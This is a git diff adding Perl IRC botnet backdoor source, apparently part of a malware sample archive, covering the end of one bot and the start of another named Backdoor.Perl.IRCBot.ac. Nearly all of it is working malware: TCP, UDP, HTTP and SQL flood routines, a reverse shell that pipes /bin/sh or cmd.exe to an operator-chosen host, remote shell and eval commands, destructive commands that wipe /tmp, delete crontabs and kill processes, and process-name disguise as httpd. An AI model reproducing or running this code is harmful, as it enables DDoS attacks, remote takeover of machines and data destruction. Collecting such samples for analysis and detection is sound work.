+	"MOT-MPx220/1.400 Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; Smartphone;",
+	"Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1;)",
+	"Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.2; Windows NT 5.1;)",
+	"Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)",
+	"Advanced Browser (http://www.avantbrowser.com)",
+	"Avant Browser (http://www.avantbrowser.com)",
+	"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)",
+	"Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)",
+	"Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)",
+	"Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007",
+	"Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511",
+	"Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929",
+	"Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0",
+	"Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox",
+	"Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4",
+	"Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5",
+	"Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6",
+	"Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6",
+	"Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7",
+	"Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7",
+	"Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4",
+	"Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4",
+	"Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5",
+	"Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1",
+	"Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1",
+	"Mozilla/5.0 (BeOS; U; BeOS BePC; en-US; rv:1.9a1) Gecko/20051002 Firefox/1.6a1",
+	"Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1",
+	"Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1",
+	"Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2",
+	"Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0",
+	"Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b",
+	"Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0",
+	"Mozilla/3.0 (OS/2; U)",
+	"Mozilla/3.0 (X11; I; SunOS 5.4 sun4m)",
+	"Mozilla/4.61 (Macintosh; I; PPC)",
+	"Mozilla/4.61 [en] (OS/2; U)",
+	"Mozilla/4.7C-CCK-MCD {C-UDP; EBM-APPLE} (Macintosh; I; PPC)",
+	"Mozilla/4.8 [en] (Windows NT 5.0; U)" );
+return(@ret);
+}
+
+
+######################
+#   End of MAILER    # 
+######################
+# A /tmp cleaner
+if ($funcarg =~ /^cleartmp/) { 
+    system 'cd /tmp;rm -rf *';
+			sendraw($IRC_cur_socket, "PRIVMSG $printl :[Voo|Doo] /tmp is Cleaned");
+			}
+#-#-#-#-#-#-#-#-#
+# Flooders IRC  #
+#-#-#-#-#-#-#-#-#		   
+# msg, @msgflood <who>
+if ($funcarg =~ /^msgflood (.+?) (.*)/) {
+	for($i=0; $i<=10; $i+=1){
+		sendraw($IRC_cur_socket, "PRIVMSG ".$1." ".$2);
+	}
+		sendraw($IRC_cur_socket, "PRIVMSG $printl :[Voo|Doo] Msg Flood Excecuted on ".$1." ");
+}
+		   
+# dccflood, @dccflood <who>
+if ($funcarg =~ /^dccflood (.*)/) {
+	for($i=0; $i<=10; $i+=1){
+		sendraw($IRC_cur_socket, "PRIVMSG ".$1." :\001DCC CHAT chat 1121485131 1024\001\n");
+	}
+		sendraw($IRC_cur_socket, "PRIVMSG $printl :[Voo|Doo] DcpFlood Excecuted on ".$1." ");
+}	   
+# ctcpflood, @ctcpflood <who>
+if ($funcarg =~ /^ctcpflood (.*)/) {
+	for($i=0; $i<=10; $i+=1){
+		sendraw($IRC_cur_socket, "PRIVMSG ".$1." :\001VERSION\001\n");
+		sendraw($IRC_cur_socket, "PRIVMSG ".$1." :\001PING\001\n");
+	}
+		sendraw($IRC_cur_socket, "PRIVMSG $printl :[Voo|Doo] Tcp Flood Excecuted on ".$1." ");
+}	   
+# noticeflood, @noticeflood <who>
+	if ($funcarg =~ /^noticeflood (.*)/) {
+		for($i=0; $i<=10; $i+=1){
+			sendraw($IRC_cur_socket, "NOTICE ".$1." :w3tFL00D\n");
+	}
+		sendraw($IRC_cur_socket, "PRIVMSG $printl :[Voo|Doo] Notice Flood Excecuted on ".$1." ");
+}	   
+# Channel Flood, @channelflood
+if ($funcarg =~ /^channelflood/) {
+	for($i=0; $i<=25; $i+=1){ 
+		sendraw($IRC_cur_socket, "JOIN #".(int(rand(99999))) );
+	}
+		sendraw($IRC_cur_socket, "PRIVMSG $printl :[Voo|Doo] Channel Flood Excecuted ");
+}
+# Maxi Flood, @maxiflood
+if ($funcarg =~ /^maxiflood(.*)/) {
+	for($i=0; $i<=15; $i+=1){
+			sendraw($IRC_cur_socket, "NOTICE ".$1." :w3tFl00D\n");
+			sendraw($IRC_cur_socket, "PRIVMSG ".$1." :\001VERSION\001\n");
+			sendraw($IRC_cur_socket, "PRIVMSG ".$1." :\001PING\001\n");
+			sendraw($IRC_cur_socket, "PRIVMSG ".$1." :w3tFl00D\n");			
+	}
+		sendraw($IRC_cur_socket, "PRIVMSG $printl :[Voo|Doo] All Flood Excecuted on ".$1." ");
+}
+######################
+#  irc    #
+######################
+			if ($funcarg =~ /^reset/) {
+				sendraw($IRC_cur_socket, "QUIT :");
+			}
+			if ($funcarg =~ /^join (.*)/) {
+				sendraw($IRC_cur_socket, "JOIN ".$1);
+			}
+			if ($funcarg =~ /^part (.*)/) {
+				sendraw($IRC_cur_socket, "PART ".$1);
+			}
+			if ($funcarg =~ /^voice (.*)/) { 
+		      sendraw($IRC_cur_socket, "MODE $printl +v ".$1);
+           }
+			if ($funcarg =~ /^devoice (.*)/) { 
+		      sendraw($IRC_cur_socket, "MODE $printl -v ".$1);
+           }
+			if ($funcarg =~ /^halfop (.*)/) { 
+		      sendraw($IRC_cur_socket, "MODE $printl +h ".$1);
+           }
+			if ($funcarg =~ /^dehalfop (.*)/) { 
+		      sendraw($IRC_cur_socket, "MODE $printl -h ".$1);
+           }
+			if ($funcarg =~ /^owner (.*)/) { 
+		      sendraw($IRC_cur_socket, "MODE $printl +q ".$1);
+           }
+			if ($funcarg =~ /^deowner (.*)/) { 
+		      sendraw($IRC_cur_socket, "MODE $printl -q ".$1);
+			}
+			if ($funcarg =~ /^op (.*)/) { 
+		      sendraw($IRC_cur_socket, "MODE $printl +o ".$1);
+           }		   
+			if ($funcarg =~ /^deop (.*)/) { 
+		      sendraw($IRC_cur_socket, "MODE $printl -o ".$1);
+           }
+######################
+#End of Join And Part#
+######################
+######################
+#     TCPFlood       #
+######################
+
+			if ($funcarg =~ /^tcpflood\s+(.*)\s+(\d+)\s+(\d+)/) {
+				sendraw($IRC_cur_socket, "PRIVMSG $printl :[Voo|Doo] Tcp Ddos Attacking ".$1.":".$2."  for ".$3." seconds.");
+				my $itime = time;
+				my ($cur_time);
+				$cur_time = time - $itime;
+				while ($3>$cur_time){
+					$cur_time = time - $itime;
+					&tcpflooder("$1","$2","$3");
+				}
+				sendraw($IRC_cur_socket,"PRIVMSG $printl :[Voo|Doo] Tcp Ddos Attack done ".$1.":".$2.".");
+			}
+######################
+#  End of TCPFlood   #
+######################
+######################
+#               SQL Fl00dEr                     #
+######################
+if ($funcarg =~ /^sqlflood\s+(.*)\s+(\d+)/) {
+sendraw($IRC_cur_socket, "PRIVMSG $printl :[Voo|Doo] Sql Ddos Attacking ".$1." on port 3306 for ".$2." seconds.");
+my $itime = time;
+my ($cur_time);
+$cur_time = time - $itime;
+while ($2>$cur_time){
+$cur_time = time - $itime;
+	my $socket = IO::Socket::INET->new(proto=>'tcp', PeerAddr=>$1, PeerPort=>3306);
+	print $socket "GET / HTTP/1.1\r\nAccept: */*\r\nHost: ".$1."\r\nConnection: Keep-Alive\r\n\r\n";
+close($socket);
+}
+sendraw($IRC_cur_socket, "PRIVMSG $printl :[Voo|Doo] Sql Attacking done ".$1.".");
+}
+######################
+#   Back Connect     #
+
+######################
+			if ($funcarg =~ /^back\s+(.*)\s+(\d+)/) {
+				my $host = "$1";
+				my $porta = "$2";
+				my $proto = getprotobyname('tcp');
+				my $iaddr = inet_aton($host);
+				my $paddr = sockaddr_in($porta, $iaddr);
+				my $shell = "/bin/sh -i";
+				if ($^O eq "MSWin32") {
+					$shell = "cmd.exe";
+				}
+				socket(SOCKET, PF_INET, SOCK_STREAM, $proto) or die "socket: $!";
+				connect(SOCKET, $paddr) or die "connect: $!";
+				open(STDIN, ">&SOCKET");
+				open(STDOUT, ">&SOCKET");
+				open(STDERR, ">&SOCKET");
+				system("$shell");
+				close(STDIN);
+				close(STDOUT);
+				close(STDERR);
+				if ($estatisticas){
+					sendraw($IRC_cur_socket, "PRIVMSG $printl :[Voo|Doo] Back Connecting to $host:$porta");
+				}
+			}
+######################
+#End of  Back Connect#
+######################
+
+######################
+#End of MultiSCANNER #
+######################
+if ($funcarg =~ /^killer/) 
+          {
+          sendraw($IRC_cur_socket, "PRIVMSG $printl :[Voo|Doo]Pid Killing.");
+          system("crontab -r");
+          $PID = $$;
+          @PIDS = `ps x |awk '{print \$1;}'`;
+          foreach my $pidi(@PIDS){
+          if($pidi == $PID){
+          return;
+          }else{
+          system("kill -9 $pidi");
+          }
+          }
+          } 
+######################
+#     HTTPFlood      #
+######################
+			if ($funcarg =~ /^httpflood\s+(.*)\s+(\d+)/) {
+				sendraw($IRC_cur_socket, "PRIVMSG $printl :[Voo|Doo] Http Flood Attacking ".$1." on port 80 for ".$2."  seconds .");
+				my $itime = time;
+				my ($cur_time);
+				$cur_time = time - $itime;
+				while ($2>$cur_time){
+					$cur_time = time - $itime;
+					my $socket = IO::Socket::INET->new(proto=>'tcp', PeerAddr=>$1, PeerPort=>80);
+					print $socket "GET / HTTP/1.1\r\nAccept: */*\r\nHost: ".$1."\r\nConnection: Keep-Alive\r\n\r\n";
+					close($socket);
+				}
+				sendraw($IRC_cur_socket, "PRIVMSG $printl :[Voo|Doo] Http-Ddos Attacking done ".$1.".");
+			}
+######################
+#  End of HTTPFlood  #
+######################
+######################
+#     UDPFlood       #
+######################
+			if ($funcarg =~ /^udpflood\s+(.*)\s+(\d+)\s+(\d+)/) {
+				sendraw($IRC_cur_socket, "PRIVMSG $printl :[Voo|Doo] Udp Attacking ".$1." with ".$2." Kb Packets for ".$3." seconds.");
+				my ($dtime, %pacotes) = udpflooder("$1", "$2", "$3");
+				$dtime = 1 if $dtime == 0;
+				my %bytes;
+				$bytes{igmp} = $2 * $pacotes{igmp};
+				$bytes{icmp} = $2 * $pacotes{icmp};
+				$bytes{o} = $2 * $pacotes{o};
+				$bytes{udp} = $2 * $pacotes{udp};
+				$bytes{tcp} = $2 * $pacotes{tcp};
+				sendraw($IRC_cur_socket, "PRIVMSG $printl :[Voo|Doo] Udp Results ".int(($bytes{icmp}+$bytes{igmp}+$bytes{udp} + $bytes{o})/1024)." Kb in ".$dtime." seconds to ".$1.".");
+			}
+######################
+#  End of Udpflood   #
+######################
+			exit;
+		}
+	}
+
+sub ircase {
+	my ($kem, $printl, $case) = @_;
+	if ($case =~ /^join (.*)/) {
+		j("$1");
+	}
+	if ($case =~ /^part (.*)/) {
+		p("$1");
+	}
+	if ($case =~ /^rejoin\s+(.*)/) {
+		my $chan = $1;
+		if ($chan =~ /^(\d+) (.*)/) {
+			for (my $ca = 1; $ca <= $1; $ca++ ) {
+				p("$2");
+				j("$2");
+			}
+		} else {
+			p("$chan");
+			j("$chan");
+		}
+	}
+
+	if ($case =~ /^op/) {
+		op("$printl", "$kem") if $case eq "op";
+		my $oarg = substr($case, 3);
+		op("$1", "$2") if ($oarg =~ /(\S+)\s+(\S+)/);
+	}
+
+	if ($case =~ /^deop/) {
+		deop("$printl", "$kem") if $case eq "deop";
+		my $oarg = substr($case, 5);
+		deop("$1", "$2") if ($oarg =~ /(\S+)\s+(\S+)/);
+	}
+
+	if ($case =~ /^msg\s+(\S+) (.*)/) {
+		msg("$1", "$2");
+	}
+
+	if ($case =~ /^flood\s+(\d+)\s+(\S+) (.*)/) {
+		for (my $cf = 1; $cf <= $1; $cf++) {
+			msg("$2", "$3");
+		}
+	}
+
+	if ($case =~ /^ctcp\s+(\S+) (.*)/) {
+		ctcp("$1", "$2");
+	}
+
+	if ($case =~ /^ctcpflood\s+(\d+)\s+(\S+) (.*)/) {
+		for (my $cf = 1; $cf <= $1; $cf++) {
+			ctcp("$2", "$3");
+		}
+	}
+
+	if ($case =~ /^nick (.*)/) {
+		nick("$1");
+	}
+
+	if ($case =~ /^connect\s+(\S+)\s+(\S+)/) {
+		conectar("$2", "$1", 6667);
+	}
+
+	if ($case =~ /^raw (.*)/) {
+		sendraw("$1");
+	}
+
+	if ($case =~ /^eval (.*)/) {
+		eval "$1";
+	}
+}
+
+sub get_html() {
+$test=$_[0];
+
+		$ip=$_[1];
+		$port=$_[2];
+
+my $req=HTTP::Request->new(GET=>$test);
+my $ua=LWP::UserAgent->new();
+if(defined($ip) && defined($port)) {
+		$ua->proxy("http","http://$ip:$port/");
+		$ua->agent("Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)");
+}
+$ua->timeout(1);
+my $response=$ua->request($req);
+if ($response->is_success) {
+	$re=$response->content;
+}
+return $re;
+}
+
+sub addproc {
+
+	my $proc=$_[0];
+	my $dork=$_[1];
+	
+	open(FILE,">>/tmp/pids");
+	print FILE $proc." [".$irc_servers{$IRC_cur_socket}{'nick'}."] $dork\n";
+	close(FILE);
+}
+
+
+sub delproc {
+
+	my $proc=$_[0];
+	open(FILE,"/tmp/pids");
+
+	while(<FILE>) {
+		$_ =~ /(\d+)\s+(.*)/;
+		$childs{$1}=$2;
+	}
+	close(FILE);
+	delete($childs{$proc});
+
+	open(FILE,">/tmp/pids");
+
+	for $klucz (keys %childs) {
+		print FILE $klucz." ".$childs{$klucz}."\n";
+	}
+}
+
+sub shell {
+	my $printl=$_[0];
+	my $comando=$_[1];
+	if ($comando =~ /cd (.*)/) {
+		chdir("$1") || msg("$printl", "No such file or directory");
+		return;
+	} elsif ($pid = fork) {
+		waitpid($pid, 0);
+	} else {
+		if (fork) {
+			exit;
+		} else {
+			my @resp=`$comando 2>&1 3>&1`;
+			my $c=0;
+			foreach my $linha (@resp) {
+				$c++;
+				chop $linha;
+				sendraw($IRC_cur_socket, "PRIVMSG $printl :$linha");
+				if ($c == "$linas_max") {
+					$c=0;
+					sleep $sleep;
+				}
+			}
+			exit;
+		}
+	}
+}
+
+sub tcpflooder {
+	my $itime = time;
+	my ($cur_time);
+	my ($ia,$pa,$proto,$j,$l,$t);
+	$ia=inet_aton($_[0]);
+	$pa=sockaddr_in($_[1],$ia);
+	$ftime=$_[2];
+	$proto=getprotobyname('tcp');
+	$j=0;$l=0;
+	$cur_time = time - $itime;
+	while ($l<1000){
+		$cur_time = time - $itime;
+		last if $cur_time >= $ftime;
+		$t="SOCK$l";
+		socket($t,PF_INET,SOCK_STREAM,$proto);
+		connect($t,$pa)||$j--;
+		$j++;
+		$l++;
+	}
+	$l=0;
+	while ($l<1000){
+		$cur_time = time - $itime;
+		last if $cur_time >= $ftime;
+		$t="SOCK$l";
+		shutdown($t,2);
+		$l++;
+	}
+}
+
+sub udpflooder {
+	my $iaddr = inet_aton($_[0]);
+	my $msg = 'A' x $_[1];
+	my $ftime = $_[2];
+	my $cp = 0;
+	my (%pacotes);
+	$pacotes{icmp} = $pacotes{igmp} = $pacotes{udp} = $pacotes{o} = $pacotes{tcp} = 0;
+	socket(SOCK1, PF_INET, SOCK_RAW, 2) or $cp++;
+	socket(SOCK2, PF_INET, SOCK_DGRAM, 17) or $cp++;
+	socket(SOCK3, PF_INET, SOCK_RAW, 1) or $cp++;
+	socket(SOCK4, PF_INET, SOCK_RAW, 6) or $cp++;
+	return(undef) if $cp == 4;
+	my $itime = time;
+	my ($cur_time);
+	while ( 1 ) {
+		for (my $porta = 1; $porta <= 65000; $porta++) {
+			$cur_time = time - $itime;
+			last if $cur_time >= $ftime;
+			send(SOCK1, $msg, 0, sockaddr_in($porta, $iaddr)) and $pacotes{igmp}++;
+			send(SOCK2, $msg, 0, sockaddr_in($porta, $iaddr)) and $pacotes{udp}++;
+			send(SOCK3, $msg, 0, sockaddr_in($porta, $iaddr)) and $pacotes{icmp}++;
+			send(SOCK4, $msg, 0, sockaddr_in($porta, $iaddr)) and $pacotes{tcp}++;
+			for (my $pc = 3; $pc <= 255;$pc++) {
+				next if $pc == 6;
+				$cur_time = time - $itime;
+				last if $cur_time >= $ftime;
+				socket(SOCK5, PF_INET, SOCK_RAW, $pc) or next;
+				send(SOCK5, $msg, 0, sockaddr_in($porta, $iaddr)) and $pacotes{o}++;
+			}
+		}
+		last if $cur_time >= $ftime;
+	}
+	return($cur_time, %pacotes);
+}
+
+sub ctcp {
+	return unless $#_ == 1;
+	sendraw("PRIVMSG $_[0] :\001$_[1]\001");
+}
+
+sub msg {
+	return unless $#_ == 1;
+	sendraw("PRIVMSG $_[0] :$_[1]");
+}
+
+sub notice {
+	return unless $#_ == 1;
+	sendraw("NOTICE $_[0] :$_[1]");
+}
+
+sub op {
+	return unless $#_ == 1;
+	sendraw("MODE $_[0] +o $_[1]");
+}
+
+sub deop {
+	return unless $#_ == 1;
+	sendraw("MODE $_[0] -o $_[1]");
+}
+
+sub j {
+	&join(@_);
+}
+
+sub join {
+	return unless $#_ == 0;
+	sendraw("JOIN $_[0]");
+}
+
+sub p {
+	part(@_);
+}
+
+sub part {
+	sendraw("PART $_[0]");
+}
+
+sub nick {
+	return unless $#_ == 0;
+	sendraw("NICK $_[0]");
+}
+
+sub quit {
+	sendraw("QUIT :$_[0]");
+}
+
+sub fetch(){
+	my $rnd=(int(rand(9999)));
+	my $n= 80;
+	if ($rnd<5000) {
+		$n<<=1;
+	}
+	my $s= (int(rand(10)) * $n);
+	my @dominios = ("removed-them-all");
+	my @str;
+	foreach $dom  (@dominios){
+		push (@str,"@gstring");
+	}
+	my $query="www.google.com/search?q=";
+	$query.=$str[(rand(scalar(@str)))];
+	$query.="&num=$n&start=$s";
+	my @lst=();
+	sendraw("privmsg #debug :DEBUG only test googling: ".$query."");
+	my $page = http_query($query);
+	while ($page =~  m/<a href=\"?http:\/\/([^>\"]+)\"? class=l>/g){
+		if ($1 !~ m/google|cache|translate/){
+			push (@lst,$1);
+		}
+	}
+	return (@lst);
+
+
+
+sub links()
+{
+my @l;
+my $link=$_[0];
+my $host=$_[0];
+my $hdir=$_[0];
+$hdir=~s/(.*)\/[^\/]*$/\1/;
+$host=~s/([-a-zA-Z0-9\.]+)\/.*/$1/;
+$host.="/";
+$link.="/";
+$hdir.="/";
+$host=~s/\/\//\//g;
+$hdir=~s/\/\//\//g;
+$link=~s/\/\//\//g;
+push(@l,$link,$host,$hdir);
+return @l;
+}
+
+sub geths(){
+my $host=$_[0];
+$host=~s/([-a-zA-Z0-9\.]+)\/.*/$1/;
+return $host;
+}
+
+sub key(){
+my $chiave=$_[0];
+$chiave =~ s/ /\+/g;
+$chiave =~ s/:/\%3A/g;
+$chiave =~ s/\//\%2F/g;
+$chiave =~ s/&/\%26/g;
+$chiave =~ s/\"/\%22/g;
+$chiave =~ s/,/\%2C/g;
+$chiave =~ s/\\/\%5C/g;
+return $chiave;
+}
+
+sub query($){
+my $url=$_[0];
+$url=~s/http:\/\///;
+my $host=$url;
+my $query=$url;
+my $page="";
+$host=~s/href=\"?http:\/\///;
+$host=~s/([-a-zA-Z0-9\.]+)\/.*/$1/;
+$query=~s/$host//;
+if ($query eq "") {$query="/";};
+eval {
+my $sock = IO::Socket::INET->new(PeerAddr=>"$host",PeerPort=>"80",Proto=>"tcp", Timeout=>"5") or return;
+print $sock "GET $query HTTP/1.0\r\nHost: $host\r\nAccept: */*\r\nUser-Agent: Mozilla/5.0\r\n\r\n";
+my @r = <$sock>;
+$page="@r";
+close($sock);
+};
+return $page;
+}
+
+sub unici{
+my @unici = ();
+my %visti = ();
+foreach my $elemento ( @_ )
+{
+next if $visti{ $elemento }++;
+push @unici, $elemento;
+}   
+return @unici;
+}
+
+sub http_query($){
+my ($url) = @_;
+my $host=$url;
+my $query=$url;
+my $page="";
+$host =~ s/href=\"?http:\/\///;
+$host =~ s/([-a-zA-Z0-9\.]+)\/.*/$1/;
+$query =~s/$host//;
+if ($query eq "") {$query="/";};
+eval {
+local $SIG{ALRM} = sub { die "1";};
+alarm 10;
+my $sock = IO::Socket::INET->new(PeerAddr=>"$host",PeerPort=>"80",Proto=>"tcp", Timeout=>"5") or return;
+print $sock "GET $query HTTP/1.0\r\nHost: $host\r\nAccept: */*\r\nUser-Agent: Mozilla/5.0\r\n\r\n";
+my @r = <$sock>;
+$page="@r";
+alarm 0;
+close($sock);
+};
+return $page;
+}}
+
diff --git a/Perl/Backdoor.Perl.IRCBot.ac b/Perl/Backdoor.Perl.IRCBot.ac
new file mode 100644
index 00000000..cbdfc616
--- /dev/null
+++ b/Perl/Backdoor.Perl.IRCBot.ac
@@ -0,0 +1,1721 @@
+
+use HTTP::Request;
+use LWP::UserAgent;
+
+my $processo = '[/usr/sbin/httpd]';
+
+my $linas_max='10';        
+my $sleep='3';
+
+my $cmd="http://usuarios.lycos.es/servius/id.txt??";
+my $id="http://usuarios.lycos.es/servius/id.txt??";
+my $spread="http://usuarios.lycos.es/servius/spreunkn.txt???";
+my $spread2="http://usuarios.lycos.es/servius/spread2.txt??";
+
+my @adms=("pOlk");
+my @canais=("#unknown");
+
+my $nick="[DOD]-".(int(rand(100)));
+my $ircname ='4a3in';
+chop (my $realname = 'demittegal ');
+
+$servidor='irc.indoirc.net' unless $servidor;
+my $porta='6667';
+
+$SIG{'INT'} = 'IGNORE';
+$SIG{'HUP'} = 'IGNORE';
+$SIG{'TERM'} = 'IGNORE';
+$SIG{'CHLD'} = 'IGNORE';
+$SIG{'PS'} = 'IGNORE';
+
+use IO::Socket;
+use Socket;
+use IO::Select;
+chdir("/");
+
+$servidor="$ARGV[0]" if $ARGV[0];
+$0="$processo"."\0"x16;;
+my $pid=fork;
+exit if $pid;
+die "Masalah fork: $!" unless defined($pid);
+
+our %irc_servers;
+our %DCC;
+my $dcc_sel = new IO::Select->new();
+$sel_cliente = IO::Select->new();
+sub sendraw {
+  if ($#_ == '1') {
+    my $socket = $_[0];
+    print $socket "$_[1]\n";
+    } else {#342
+    print $IRC_cur_socket "$_[0]\n";
+  }
+}
+
+sub conectar {
+  my $meunick = $_[0];
+  my $servidor_con = $_[1];
+  my $porta_con = $_[2];
+  my $IRC_socket = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$servidor_con",
+  PeerPort=>$porta_con) or return(1);
+  if (defined($IRC_socket)) {
+    $IRC_cur_socket = $IRC_socket;
+    $IRC_socket->autoflush(1);
+    $sel_cliente->add($IRC_socket);
+    $irc_servers{$IRC_cur_socket}{'host'} = "$servidor_con";
+    $irc_servers{$IRC_cur_socket}{'porta'} = "$porta_con";
+    $irc_servers{$IRC_cur_socket}{'nick'} = $meunick;
+    $irc_servers{$IRC_cur_socket}{'meuip'} = $IRC_socket->sockhost;
+    nick("$meunick");
+    sendraw("USER $ircname ".$IRC_socket->sockhost." $servidor_con :$realname");
+    sleep 1;
+  }
+}
+
+my $line_temp;
+while( 1 ) {
+  while (!(keys(%irc_servers))) { conectar("$nick", "$servidor", "$porta"); }
+  delete($irc_servers{''}) if (defined($irc_servers{''}));
+  my @ready = $sel_cliente->can_read(0);
+  next unless(@ready);
+  foreach $fh (@ready) {
+    $IRC_cur_socket = $fh;
+    $meunick = $irc_servers{$IRC_cur_socket}{'nick'};
+    $nread = sysread($fh, $msg, 4096);
+    if ($nread == 0) {
+      $sel_cliente->remove($fh);
+      $fh->close;
+      delete($irc_servers{$fh});
+    }
+    @lines = split (/\n/, $msg);
+    for(my $c=0; $c<= $#lines; $c++) {
+
+      $line = $lines[$c];
+      $line=$line_temp.$line if ($line_temp);
+      $line_temp='';
+      $line =~ s/\r$//;
+      unless ($c == $#lines) {
+        parse("$line");
+        } else {
+        if ($#lines == 0) {
+          parse("$line");
+          } elsif ($lines[$c] =~ /\r$/) {
+          parse("$line");
+          } elsif ($line =~ /^(\S+) NOTICE AUTH :\*\*\*/) {
+          parse("$line"); 
+          	   } else {
+          	               $line_temp = $line;
+        }
+      }
+    }
+  }
+}
+
+sub parse {
+  my $servarg = shift;
+  if ($servarg =~ /^PING \:(.*)/) {
+    sendraw("PONG :$1");
+    } elsif ($servarg =~ /^\:(.+?)\!(.+?)\@(.+?) PRIVMSG (.+?) \:(.+)/) {
+    my $pn=$1; my $hostmask= $3; my $onde = $4; my $args = $5;
+    if ($args =~ /^\001VERSION\001$/) {
+      	 notice("$pn", "\001VERSION mIRC v6.17 MaXiMiZeR\001");
+    }
+    if (grep {$_ =~ /^\Q$pn\E$/i } @adms ) {
+    if ($onde eq "$meunick"){
+    shell("$pn", "$args");
+  }
+  
+#End of Connect
+
+######################
+#      PREFIX        #
+######################
+  
+  if ($args =~ /^(\Q$meunick\E|\!max)\s+(.*)/ ) {
+    my $natrix = $1;
+    my $arg = $2;
+    if ($arg =~ /^\!(.*)/) {
+      ircase("$pn","$onde","$1") unless ($natrix eq "!max" and $arg =~ /^\!nick/);
+      } elsif ($arg =~ /^\@(.*)/) {
+      $ondep = $onde;
+      $ondep = $pn if $onde eq $meunick;
+      bfunc("$ondep","$1");
+      } else {
+      shell("$onde", "$arg");
+    }
+  }
+}
+}
+######################
+#   End of PREFIX    #
+######################
+
+elsif ($servarg =~ /^\:(.+?)\!(.+?)\@(.+?)\s+NICK\s+\:(\S+)/i) {
+if (lc($1) eq lc($meunick)) {
+  $meunick=$4;
+  $irc_servers{$IRC_cur_socket}{'nick'} = $meunick;
+}
+} elsif ($servarg =~ m/^\:(.+?)\s+433/i) {
+nick("$meunick".int rand(999999));
+} elsif ($servarg =~ m/^\:(.+?)\s+001\s+(\S+)\s/i) {
+$meunick = $2;
+$irc_servers{$IRC_cur_socket}{'nick'} = $meunick;
+$irc_servers{$IRC_cur_socket}{'nome'} = "$1";
+foreach my $canal (@canais) {
+  sendraw("JOIN $canal ddosit");
+}
+}
+}
+
+sub bfunc {
+my $printl = $_[0];
+my $funcarg = $_[1];
+if (my $pid = fork) {
+waitpid($pid, 0);
+} else {
+if (fork) {
+  exit;
+} else {
+
+######################
+#       Help         #
+######################
+
+if ($funcarg =~ /^help/) {
+	sendraw($IRC_cur_socket, "PRIVMSG $printl :3,14 11How To Use 3[7U3]8nknown3[7BOT3] ");
+	sendraw($IRC_cur_socket, "PRIVMSG $printl :12 !max 7 Linux Commands ");
+	sendraw($IRC_cur_socket, "PRIVMSG $printl :12 !max 7@4portscan <ip> ");
+	sendraw($IRC_cur_socket, "PRIVMSG $printl :12 !max 7@4nmap <ip> <beginport> <endport> ");
+	sendraw($IRC_cur_socket, "PRIVMSG $printl :12 !max 7@4back <ip><port> ");
+	sendraw($IRC_cur_socket, "PRIVMSG $printl :12 !max 7@4udpflood <ip> <packet size> <time> ");
+	sendraw($IRC_cur_socket, "PRIVMSG $printl :12 !max 7@4tcpflood <ip> <port> <packet size> <time> ");
+	sendraw($IRC_cur_socket, "PRIVMSG $printl :12 !max 7@4httpflood <site> <time> ");
+	sendraw($IRC_cur_socket, "PRIVMSG $printl :12 !max 7@4rfi <vuln> <dork> ");
+	sendraw($IRC_cur_socket, "PRIVMSG $printl :12 !max 7@4logcleaner    ");
+	sendraw($IRC_cur_socket, "PRIVMSG $printl :12 !max 7@4milw0rm       ");
+	sendraw($IRC_cur_socket, "PRIVMSG $printl :12 !max 7@4join #channel ");
+	sendraw($IRC_cur_socket, "PRIVMSG $printl :12 !max 7@4part #channel ");
+	sendraw($IRC_cur_socket, "PRIVMSG $printl :12 !max 7@4spread ~/OFF/~ ");
+	sendraw($IRC_cur_socket, "PRIVMSG $printl :12 !max 7@4Pbots ~/OFF/~ ");
+	sendraw($IRC_cur_socket, "PRIVMSG $printl :12 My boss is pOlk");
